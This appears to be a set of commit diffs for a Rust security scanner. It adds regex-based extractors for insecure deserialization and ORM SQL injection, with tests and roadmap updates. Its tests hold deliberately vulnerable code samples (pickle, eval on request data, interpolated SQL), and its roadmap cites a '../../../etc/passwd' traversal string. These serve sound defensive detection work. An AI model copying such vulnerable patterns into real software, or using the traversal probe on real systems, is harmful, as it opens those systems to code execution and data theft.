| Python httpx | ✅ `httpx.get(url)`, `AsyncClient` |
| JavaScript fetch | ✅ `fetch(url)`, `fetch(req.query...)` |
| JavaScript axios | ✅ `axios.get(url)`, `axios.post(target)` |
| JavaScript got | ✅ `got(url)` |
| Go http.Get/Post | ✅ `http.Get(url)`, `http.NewRequest(...)` |
| Rust reqwest | ✅ `reqwest::get(url)`, `reqwest::Client` |
| URL sink patterns | ✅ `proxy_url`, `webhook_url`, `callback_url` from request |
| Tests | ✅ 10+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, Rust
HTTP requests with user-controlled URLs:
@ -1910,9 +1977,23 @@ client.Do(req) // Where req.URL is user-controlled
---
### 8.10 Missing Security Headers
### 8.10 Missing Security Headers
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `SecurityHeadersExtractor` | ✅ `extractors/security_headers.rs` |
| X-Frame-Options disabled | ✅ `X-Frame-Options: none`, `ALLOWALL` |
| X-Content-Type-Options disabled | ✅ `X-Content-Type-Options: disabled` |
| X-XSS-Protection disabled | ✅ `X-XSS-Protection: false` |
| Django SECURE_* settings | ✅ `SECURE_BROWSER_XSS_FILTER = False`, etc. |
| YAML headers disabled | ✅ `x_frame_options: false`, `hsts: no` |
| CSP disabled or unsafe | ✅ `unsafe-inline`, `unsafe-eval` directives |
| HSTS disabled | ✅ `Strict-Transport-Security: none`, `hsts_seconds = 0` |
| Tests | ✅ 7+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, YAML, JSON, TOML
Detect when security headers are explicitly removed or not set:
@ -1963,9 +2044,22 @@ res.cookie('auth', value, { sameSite: 'none' });
---
### 8.12 Unvalidated Redirects
### 8.12 Unvalidated Redirects
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `UnvalidatedRedirectsExtractor` | ✅ `extractors/unvalidated_redirects.rs` |
| Python redirect with user input | ✅ `redirect(request.GET['next'])`, `HttpResponseRedirect(url)` |
| Python Flask redirect | ✅ `redirect(request.args.get(...))` |
| JavaScript res.redirect | ✅ `res.redirect(req.query.next)` |
| JavaScript window.location | ✅ `window.location = url`, `location.href = params...` |
| Go http.Redirect | ✅ `http.Redirect(w, r, r.Query...)` |
| URL parameter patterns | ✅ `redirect_url`, `return_url`, `next`, `goto` from request |
| Tests | ✅ 7+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Open redirect vulnerabilities:
@ -1984,9 +2078,26 @@ window.location.href = params.url;
---
### 8.13 XXE (XML External Entity)
### 8.13 XXE (XML External Entity)
**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `XxeExtractor` | ✅ `extractors/xxe.rs` |
| Python lxml/etree | ✅ `etree.parse()`, `lxml.fromstring()` |
| Python xml.etree.ElementTree | ✅ `ET.parse()`, `ET.fromstring()` |
| Python xml.dom.minidom | ✅ `minidom.parse()`, `minidom.parseString()` |
| Python xml.sax | ✅ `xml.sax.parse()`, `xml.sax.make_parser()` |
| JavaScript xml2js | ✅ `xml2js.parseString()`, `xml2js.Parser()` |
| JavaScript libxmljs | ✅ `libxmljs.parseXml()` |
| Go encoding/xml | ✅ `xml.Unmarshal()`, `xml.NewDecoder()` |
| Java patterns (polyglot) | ✅ `DocumentBuilderFactory`, `SAXParser`, `XMLReader` |
| DTD entity declarations | ✅ `<!ENTITY ... SYSTEM>`, `<!ENTITY ... PUBLIC>` |
| defusedxml detection | ✅ Lower confidence when defusedxml is imported |
| Tests | ✅ 9+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Unsafe XML parsing:
@ -2004,9 +2115,21 @@ SAXParserFactory.newInstance() // Without secure processing
---
### 8.14 Weak Password Requirements
### 8.14 Weak Password Requirements
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `WeakPasswordExtractor` | ✅ `extractors/weak_password.rs` |
| Minimum length < 8 | ✅ `password_min_length: 6`, `minLength: 4` |
| Bcrypt cost < 10 | ✅ `bcrypt_cost = 8`, `hash_rounds = 5` |
| Simple length checks | ✅ `len(password) >= 6` in code |
| Complexity disabled | ✅ `require_special_chars: false`, `require_uppercase = false` |
| Number requirement disabled | ✅ `require_numbers: no`, `require_digit = 0` |
| Tests | ✅ 7+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, Rust, YAML, JSON, TOML
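The two numeric thresholds in the table (minimum length below 8, bcrypt cost below 10) can be expressed as a small policy check. The types and function here are hypothetical and only illustrate the thresholds. The extractor itself works on regex matches, not on parsed settings.

```rust
/// Thresholds taken from the table above.
pub const MIN_PASSWORD_LENGTH: u32 = 8;
pub const MIN_BCRYPT_COST: u32 = 10;

/// Hypothetical finding types for a parsed password policy.
#[derive(Debug, PartialEq, Eq)]
pub enum Weakness {
    ShortMinimumLength(u32),
    LowBcryptCost(u32),
}

/// Flags configured values that fall below the thresholds.
/// `None` means the setting was not present and is not judged here.
pub fn check_policy(min_length: Option<u32>, bcrypt_cost: Option<u32>) -> Vec<Weakness> {
    let mut found = Vec::new();
    if let Some(len) = min_length.filter(|&l| l < MIN_PASSWORD_LENGTH) {
        found.push(Weakness::ShortMinimumLength(len));
    }
    if let Some(cost) = bcrypt_cost.filter(|&c| c < MIN_BCRYPT_COST) {
        found.push(Weakness::LowBcryptCost(cost));
    }
    found
}
```

For example, `password_min_length: 6` with `bcrypt_cost = 8` would yield both findings, while a policy of length 8 and cost 10 would yield none.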
Password validation that's too weak:
@ -2071,26 +2194,24 @@ async fn extract_with_llm(code: &str, file: &str) -> Vec<ExtractedClaim> {
| **8.1** | High-entropy secrets | HIGH | MEDIUM | Catches real leaked secrets | ✅ |
| **8.2** | Framework-specific | HIGH | HIGH | Spring/Django/Express coverage | ⬜ |
| **8.3** | Config deep parsing | HIGH | MEDIUM | Nested YAML/JSON understanding | ⬜ |
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | ⬜ |
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | ⬜ |
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | ✅ |
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | ✅ |
| **8.6** | Auth bypass | HIGH | MEDIUM | Backdoors, hardcoded creds | ✅ |
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | ⬜ |
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | ⬜ |
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | ⬜ |
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | ⬜ |
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | ✅ |
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | ✅ |
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | ✅ |
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | ✅ |
| **8.11** | Cookie flags | MEDIUM | LOW | httpOnly, secure, sameSite | ✅ |
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | ⬜ |
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | ⬜ |
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | ⬜ |
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | ✅ |
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | ✅ |
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | ✅ |
| **8.15** | LLM extraction | VERY HIGH | VERY HIGH | Semantic understanding | ✅ (Phase 7.5) |
**MVP Complete (8.1, 8.6, 8.11):** High-impact extractors for enterprise pilots.
**Phase 8 first pass complete (8.1, 8.4-8.14):** 12 of 14 Phase 8 extractors are implemented; 8.2 and 8.3 are deferred.
**Recommended order for remaining extractors:**
1. **8.3** Config deep parsing (foundational for 8.2)
2. **8.2** Framework-specific (customer-driven)
3. **8.5** ORM SQL injection (common in enterprise apps)
4. **8.7** Deserialization (critical vulnerabilities)
**Remaining deferred extractors:**
1. **8.2** Framework-specific (HIGH effort - Spring, Django, Express, Rails)
2. **8.3** Config deep parsing (HIGH effort - YAML/JSON AST parsing)
---


@ -40,10 +40,19 @@ impl Default for ExtractorConfig {
"unreal_cpp".to_string(),
"unreal_config".to_string(),
"unreal_performance".to_string(),
// Phase 8: Enterprise extractors
// Phase 8: Enterprise extractors (first batch)
"high_entropy_secrets".to_string(),
"auth_bypass".to_string(),
"insecure_cookies".to_string(),
// Phase 8: Enterprise extractors (second batch)
"path_traversal".to_string(),
"unvalidated_redirects".to_string(),
"weak_password".to_string(),
"security_headers".to_string(),
"insecure_deserialization".to_string(),
"ssrf".to_string(),
"orm_injection".to_string(),
"xxe".to_string(),
],
disabled: vec![],
timeout_config: TimeoutExtractorConfig::default(),


@ -0,0 +1,386 @@
//! Insecure deserialization vulnerability extractor.
//!
//! Detects patterns where untrusted data is deserialized using unsafe methods,
//! which can lead to remote code execution vulnerabilities.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for insecure deserialization vulnerabilities.
///
/// Detects patterns indicating unsafe deserialization:
/// - Python pickle (critical - RCE)
/// - Python yaml.load without SafeLoader
/// - Python marshal
/// - Python eval/exec with user input
/// - JavaScript node-serialize
/// - Go gob without validation
/// - Java ObjectInputStream patterns
pub struct InsecureDeserializationExtractor {
// Python patterns (critical)
python_pickle: Regex,
python_yaml_unsafe: Regex,
python_marshal: Regex,
python_eval: Regex,
// JavaScript patterns
js_serialize: Regex,
// Go patterns
go_gob: Regex,
// Java-style patterns (polyglot detection)
java_ois: Regex,
}
impl Default for InsecureDeserializationExtractor {
fn default() -> Self {
Self::new()
}
}
impl InsecureDeserializationExtractor {
/// Create a new insecure deserialization extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: pickle (critical - allows arbitrary code execution)
python_pickle: Regex::new(r#"pickle\.(?:loads?|Unpickler)\s*\("#).expect("valid regex"),
// Python: yaml.load / yaml.unsafe_load (yaml.safe_load is OK and never matches).
// The SafeLoader exclusion is applied per line in extract(), not by this pattern.
python_yaml_unsafe: Regex::new(r#"yaml\.(?:load|unsafe_load)\s*\([^)]*(?:\)|,[^S])"#)
.expect("valid regex"),
// Python: marshal (unsafe, similar to pickle)
python_marshal: Regex::new(r#"marshal\.loads?\s*\("#).expect("valid regex"),
// Python: eval/exec with user input
python_eval: Regex::new(
r#"(?:eval|exec)\s*\(\s*(?:request\.|params\.|input|user|data)"#,
)
.expect("valid regex"),
// JavaScript: node-serialize (known vulnerable)
js_serialize: Regex::new(
r#"(?:require\s*\(\s*["']node-serialize["']\)|\.unserialize\s*\()"#,
)
.expect("valid regex"),
// Go: gob decoder (can be unsafe with untrusted input)
go_gob: Regex::new(r#"gob\.(?:NewDecoder|Decode)\s*\("#).expect("valid regex"),
// Java-style patterns (for polyglot detection in config files, etc.)
java_ois: Regex::new(r#"ObjectInputStream|readObject\s*\(\)"#).expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
method: &str,
confidence: f32,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["serialization", "deserialization"],
"deserialize_method",
ObjectValue::Text(method.to_string()),
file,
line,
matched,
confidence,
description,
)
}
}
impl Extractor for InsecureDeserializationExtractor {
fn name(&self) -> &str {
"insecure_deserialization"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
match language {
Language::Python => {
// Pickle (critical - RCE)
if let Some(m) = self.python_pickle.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"pickle",
0.95,
"pickle deserialization allows arbitrary code execution (CRITICAL)",
));
}
// yaml.load without SafeLoader
if let Some(m) = self.python_yaml_unsafe.find(line) {
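// Skip lines that name SafeLoader or call yaml.safe_load. Matching the full
// "yaml.safe_load" prefix keeps yaml.unsafe_load from being skipped by accident.
if !line.contains("SafeLoader") && !line.contains("yaml.safe_load") {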
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"yaml_unsafe",
0.85,
"yaml.load without SafeLoader allows code execution",
));
}
}
// marshal
if let Some(m) = self.python_marshal.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"marshal",
0.9,
"marshal deserialization is unsafe with untrusted data",
));
}
// eval/exec with user input
if let Some(m) = self.python_eval.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"eval",
0.95,
"eval/exec with user input allows arbitrary code execution (CRITICAL)",
));
}
}
Language::JavaScript | Language::TypeScript => {
// node-serialize (known vulnerable)
if let Some(m) = self.js_serialize.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"node_serialize",
0.95,
"node-serialize is vulnerable to remote code execution (CVE-2017-5941)",
));
}
}
Language::Go => {
// gob decoder
if let Some(m) = self.go_gob.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"gob",
0.75, // Lower confidence - gob is safer but can still be problematic
"gob deserialization with untrusted input may be unsafe",
));
}
}
_ => {}
}
// Check for Java patterns in any language (polyglot detection)
if let Some(m) = self.java_ois.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"java_ois",
0.85,
"Java ObjectInputStream deserialization is vulnerable to RCE",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_pickle() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
data = pickle.loads(request.data)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("CRITICAL"));
assert!(claims[0].confidence >= 0.9);
}
#[test]
fn test_python_pickle_load() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
with open('data.pkl', 'rb') as f:
obj = pickle.load(f)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_yaml_unsafe() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
data = yaml.load(file_content)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("SafeLoader"));
}
#[test]
fn test_python_yaml_safe_no_detection() {
let extractor = InsecureDeserializationExtractor::new();
// Safe: using SafeLoader
let content = r#"
data = yaml.load(file_content, Loader=yaml.SafeLoader)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
assert!(claims.is_empty());
}
#[test]
fn test_python_marshal() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
obj = marshal.loads(data)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_eval() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
result = eval(request.data)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("CRITICAL"));
}
#[test]
fn test_js_node_serialize_require() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
const s = require('node-serialize');
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1); // require pattern
}
#[test]
fn test_js_unserialize() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
const obj = s.unserialize(data);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1); // unserialize pattern
}
#[test]
fn test_go_gob() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
dec := gob.NewDecoder(reader)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
assert_eq!(claims.len(), 1); // NewDecoder
}
#[test]
fn test_go_gob_decode() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
err := gob.Decode(&data)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
assert_eq!(claims.len(), 1); // Decode
}
#[test]
fn test_java_ois_polyglot() {
let extractor = InsecureDeserializationExtractor::new();
// Java pattern detected in any language
let content = r#"
ObjectInputStream ois = new ObjectInputStream(inputStream);
Object obj = ois.readObject();
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
assert_eq!(claims.len(), 2); // ObjectInputStream and readObject
}
}
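
Review note on the YAML guard in the extractor above: a plain substring test for `safe_load` is also true for `unsafe_load`, so a guard written that way can skip the very call it should flag. The sketch below shows the pitfall and one stricter check using only `std` string operations. The helper name `is_unsafe_yaml_call` is hypothetical and not part of this commit; it is an illustration under those assumptions, not the extractor's actual logic.

```rust
/// Hypothetical helper (not part of the extractor): decides whether a line
/// calls an unsafe PyYAML loader, using only std string operations.
fn is_unsafe_yaml_call(line: &str) -> bool {
    // `yaml.unsafe_load(` is unsafe regardless of anything else on the line.
    if line.contains("yaml.unsafe_load(") {
        return true;
    }
    // `yaml.load(` is treated as unsafe unless a SafeLoader is named on the
    // same line. `yaml.safe_load(` never matches "yaml.load(" at all.
    line.contains("yaml.load(") && !line.contains("SafeLoader")
}

/// Shows why a naive substring guard is too broad: the text "unsafe_load"
/// contains "safe_load", so the naive check reports `true` here.
fn naive_guard_matches_unsafe_load() -> bool {
    "yaml.unsafe_load(data)".contains("safe_load")
}
```

Like the extractor, this works one line at a time, so a `Loader=` argument placed on a following line would not be seen.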


@ -18,6 +18,14 @@
//! - `high_entropy_secrets`: High-entropy strings likely to be leaked secrets
//! - `auth_bypass`: Authentication bypass patterns (hardcoded creds, debug auth)
//! - `insecure_cookies`: Cookies missing Secure/HttpOnly flags
//! - `path_traversal`: File operations with user-controlled paths
//! - `unvalidated_redirects`: HTTP redirects with user-controlled URLs
//! - `weak_password`: Weak password policy configurations
//! - `security_headers`: Missing or disabled security headers
//! - `insecure_deserialization`: Unsafe deserialization (pickle, yaml.load, etc.)
//! - `ssrf`: HTTP requests with user-controlled URLs
//! - `orm_injection`: ORM methods with string interpolation
//! - `xxe`: XML parsing without external entity protection
//!
//! # Declarative Extractors
//!
@ -32,10 +40,15 @@ mod dep_versions;
mod hardcoded_secrets;
mod high_entropy;
mod insecure_cookies;
mod insecure_deserialization;
mod jwt_config;
mod orm_injection;
mod path_traversal;
mod rate_limit;
mod registry;
mod security_headers;
mod sql_injection;
mod ssrf;
mod timeout_config;
mod tls_verify;
mod tls_version;
@ -43,7 +56,10 @@ mod traits;
mod unreal_config;
mod unreal_cpp;
mod unreal_performance;
mod unvalidated_redirects;
mod weak_crypto;
mod weak_password;
mod xxe;
pub use auth_bypass::AuthBypassExtractor;
pub use command_injection::CommandInjectionExtractor;
@ -55,10 +71,15 @@ pub use dep_versions::DepVersionsExtractor;
pub use hardcoded_secrets::HardcodedSecretsExtractor;
pub use high_entropy::HighEntropySecretsExtractor;
pub use insecure_cookies::InsecureCookiesExtractor;
pub use insecure_deserialization::InsecureDeserializationExtractor;
pub use jwt_config::JwtConfigExtractor;
pub use orm_injection::OrmInjectionExtractor;
pub use path_traversal::PathTraversalExtractor;
pub use rate_limit::{RateLimitExtractor, RateLimitThresholds};
pub use registry::ExtractorRegistry;
pub use security_headers::SecurityHeadersExtractor;
pub use sql_injection::SqlInjectionExtractor;
pub use ssrf::SsrfExtractor;
pub use timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
pub use tls_verify::TlsVerifyExtractor;
pub use tls_version::TlsVersionExtractor;
@ -66,4 +87,7 @@ pub use traits::{build_claim, is_test_file, Extractor};
pub use unreal_config::UnrealConfigExtractor;
pub use unreal_cpp::UnrealCppExtractor;
pub use unreal_performance::UnrealPerformanceExtractor;
pub use unvalidated_redirects::UnvalidatedRedirectsExtractor;
pub use weak_crypto::WeakCryptoExtractor;
pub use weak_password::WeakPasswordExtractor;
pub use xxe::XxeExtractor;


@ -0,0 +1,370 @@
//! ORM SQL injection vulnerability extractor.
//!
//! Detects patterns where ORM methods are used with string interpolation
//! instead of proper parameterized queries, which can lead to SQL injection.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for ORM-specific SQL injection vulnerabilities.
///
/// Detects patterns indicating unsafe query construction in popular ORMs:
/// - Django: .raw() and .extra() with string interpolation
/// - SQLAlchemy: text() and execute() with f-strings
/// - Sequelize: query() with template literals
/// - TypeORM: where() with template literals
/// - GORM: Raw() with fmt.Sprintf
/// - Prisma: $queryRawUnsafe with interpolation
pub struct OrmInjectionExtractor {
// Django patterns
django_raw: Regex,
django_extra: Regex,
// SQLAlchemy patterns
sqlalchemy_text: Regex,
sqlalchemy_exec: Regex,
// Sequelize patterns
sequelize_raw: Regex,
// TypeORM patterns
typeorm_where: Regex,
// GORM patterns
gorm_raw: Regex,
// Prisma patterns
prisma_raw: Regex,
}
impl Default for OrmInjectionExtractor {
fn default() -> Self {
Self::new()
}
}
impl OrmInjectionExtractor {
/// Create a new ORM injection extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Django: raw/extra with formatting
django_raw: Regex::new(r#"\.raw\s*\(\s*(?:f["']|["'][^"']*\{[^}]*\}["']\.format)"#)
.expect("valid regex"),
django_extra: Regex::new(r#"\.extra\s*\([^)]*where\s*=\s*\[.*(?:f["']|%)"#)
.expect("valid regex"),
// SQLAlchemy: text with formatting
sqlalchemy_text: Regex::new(r#"text\s*\(\s*(?:f["']|["'][^"']*%|["'][^"']*\.format)"#)
.expect("valid regex"),
sqlalchemy_exec: Regex::new(r#"\.execute\s*\(\s*(?:f["']|["'][^"']*\{)"#)
.expect("valid regex"),
// Sequelize: raw query interpolation
sequelize_raw: Regex::new(r#"sequelize\.query\s*\(\s*`[^`]*\$\{"#)
.expect("valid regex"),
// TypeORM: where with interpolation
typeorm_where: Regex::new(r#"\.(?:where|andWhere|orWhere)\s*\(\s*`[^`]*\$\{"#)
.expect("valid regex"),
// GORM: Raw with Sprintf
gorm_raw: Regex::new(r#"\.Raw\s*\(\s*(?:fmt\.Sprintf|"[^"]*"\s*\+)"#)
.expect("valid regex"),
// Prisma: $queryRawUnsafe
prisma_raw: Regex::new(r#"\$queryRawUnsafe\s*\(\s*`[^`]*\$\{"#).expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
orm: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["db", "orm", "query"],
"query_construction",
ObjectValue::Text(format!("interpolated_{}", orm)),
file,
line,
matched,
0.9,
description,
)
}
}
impl Extractor for OrmInjectionExtractor {
fn name(&self) -> &str {
"orm_injection"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
match language {
Language::Python => {
// Django raw queries
if let Some(m) = self.django_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"django",
"Django .raw() with string interpolation (SQL injection risk)",
));
}
// Django extra queries
if let Some(m) = self.django_extra.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"django",
"Django .extra() with interpolation (SQL injection risk)",
));
}
// SQLAlchemy text
if let Some(m) = self.sqlalchemy_text.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sqlalchemy",
"SQLAlchemy text() with interpolation (SQL injection risk)",
));
}
// SQLAlchemy execute
if let Some(m) = self.sqlalchemy_exec.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sqlalchemy",
"SQLAlchemy execute() with f-string (SQL injection risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
// Sequelize raw query
if let Some(m) = self.sequelize_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sequelize",
"Sequelize raw query with template literal (SQL injection risk)",
));
}
// TypeORM where
if let Some(m) = self.typeorm_where.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"typeorm",
"TypeORM where() with template literal (SQL injection risk)",
));
}
// Prisma queryRawUnsafe
if let Some(m) = self.prisma_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"prisma",
"Prisma $queryRawUnsafe with interpolation (SQL injection risk)",
));
}
}
Language::Go => {
// GORM Raw
if let Some(m) = self.gorm_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"gorm",
"GORM Raw() with fmt.Sprintf (SQL injection risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_django_raw_fstring() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
users = User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("db/orm/query"));
}
#[test]
fn test_django_raw_format() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
users = User.objects.raw("SELECT * FROM users WHERE id = {}".format(user_id))
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
// This matches the django_raw pattern (has {} and .format)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_sqlalchemy_text() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
result = session.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
"#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("SQLAlchemy"));
}
#[test]
fn test_sqlalchemy_execute_fstring() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
conn.execute(f"UPDATE users SET name = '{name}' WHERE id = {id}")
"#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_sequelize_raw() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
const users = await sequelize.query(`SELECT * FROM users WHERE id = ${userId}`);
"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "db.js");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Sequelize"));
}
#[test]
fn test_typeorm_where() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
const user = await userRepo.createQueryBuilder("user")
.where(`user.id = ${userId}`)
.getOne();
"#;
let claims =
extractor.extract(&["ts".to_string()], content, Language::TypeScript, "user.ts");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_gorm_raw() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
db.Raw(fmt.Sprintf("SELECT * FROM users WHERE id = %d", userID)).Scan(&user)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "repo.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("GORM"));
}
#[test]
fn test_prisma_query_raw_unsafe() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
const users = await prisma.$queryRawUnsafe(`SELECT * FROM users WHERE id = ${userId}`);
"#;
let claims = extractor.extract(&["ts".to_string()], content, Language::TypeScript, "db.ts");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Prisma"));
}
#[test]
fn test_no_false_positives_parameterized() {
let extractor = OrmInjectionExtractor::new();
// Safe: parameterized query - no f-string, no .format(), just a ? placeholder with bound values
let content = r#"
users = User.objects.raw("SELECT * FROM users WHERE id = ?", [user_id])
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_orm_filter() {
let extractor = OrmInjectionExtractor::new();
// Safe: using ORM filter methods
let content = r#"
users = User.objects.filter(id=user_id)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert!(claims.is_empty());
}
}
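
Review note on the ORM patterns above: the distinction they draw is between a query string built by interpolation and a constant query string with separately bound values. As a rough, std-only illustration of the first branch of the `django_raw` pattern (an f-string passed directly to `.raw(`), the sketch below uses a hypothetical helper `raw_call_uses_fstring`. It is simpler than the regex: it does not allow whitespace between `raw` and `(`, and it ignores the `.format` branch.

```rust
/// Hypothetical helper (not part of the extractor): returns true when the
/// first argument of a `.raw(` call on this line starts as a Python f-string.
fn raw_call_uses_fstring(line: &str) -> bool {
    const CALL: &str = ".raw(";
    match line.find(CALL) {
        Some(idx) => {
            // Look at what follows the opening parenthesis, ignoring spaces.
            let arg = line[idx + CALL.len()..].trim_start();
            arg.starts_with("f\"") || arg.starts_with("f'")
        }
        // No `.raw(` call on this line.
        None => false,
    }
}
```

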